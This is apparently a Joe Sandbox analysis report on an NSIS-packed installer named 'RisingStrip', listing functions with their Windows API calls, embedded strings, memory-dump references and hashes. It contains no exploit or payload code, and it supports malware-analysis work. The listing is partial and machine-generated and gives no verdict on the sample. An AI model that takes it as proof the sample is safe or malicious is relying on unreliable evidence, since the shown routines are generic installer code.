SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: "%s" (%d), xrefs: 004017BF
SetFileAttributes failed., xrefs: 004017A1
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Aborting: "%s", xrefs: 0040161D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes: "%s":%08X, xrefs: 0040177B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Jump: %d, xrefs: 00401602
Rename: %s, xrefs: 004018F8
Sleep(%d), xrefs: 0040169D
Rename failed: %s, xrefs: 0040194B
Call: %d, xrefs: 0040165A
detailprint: %s, xrefs: 00401679
BringToFront, xrefs: 004016BD

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEd32, xrefs: 00405BA8
RichEd20, xrefs: 00405B9D
@%F, xrefs: 004059F6
.exe, xrefs: 00405A3D
B%F, xrefs: 00405A1F
@rD, xrefs: 00405965
.DEFAULT\Control Panel\International, xrefs: 00405999
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
_Nb, xrefs: 00405AD1
RichEdit, xrefs: 00405BC4
RichEdit20A, xrefs: 00405BB6, 00405BBB

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,KaraokeQualification,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,KaraokeQualification,KaraokeQualification,00000000,00000000,KaraokeQualification,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error creating "%s", xrefs: 00401AF0
KaraokeQualification, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user retry, xrefs: 00401B40
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$KaraokeQualification
API String ID: 4286501637-2701191641
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
Error launching installer, xrefs: 004035D7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675
Inst, xrefs: 0040366C

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
P1B, xrefs: 004033A9
X1C, xrefs: 004033ED
... %d%%, xrefs: 0040349E

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00735D20), ref: 00402387

Strings

]s, xrefs: 00401EBC, 00401F06, 00401F15, 00401F48, 00401F6E, 00401F75
KaraokeQualification, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: ]s$Exch: stack < %d elements$KaraokeQualification$Pop: stack empty
API String ID: 1459762280-2314306438
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00735D20), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
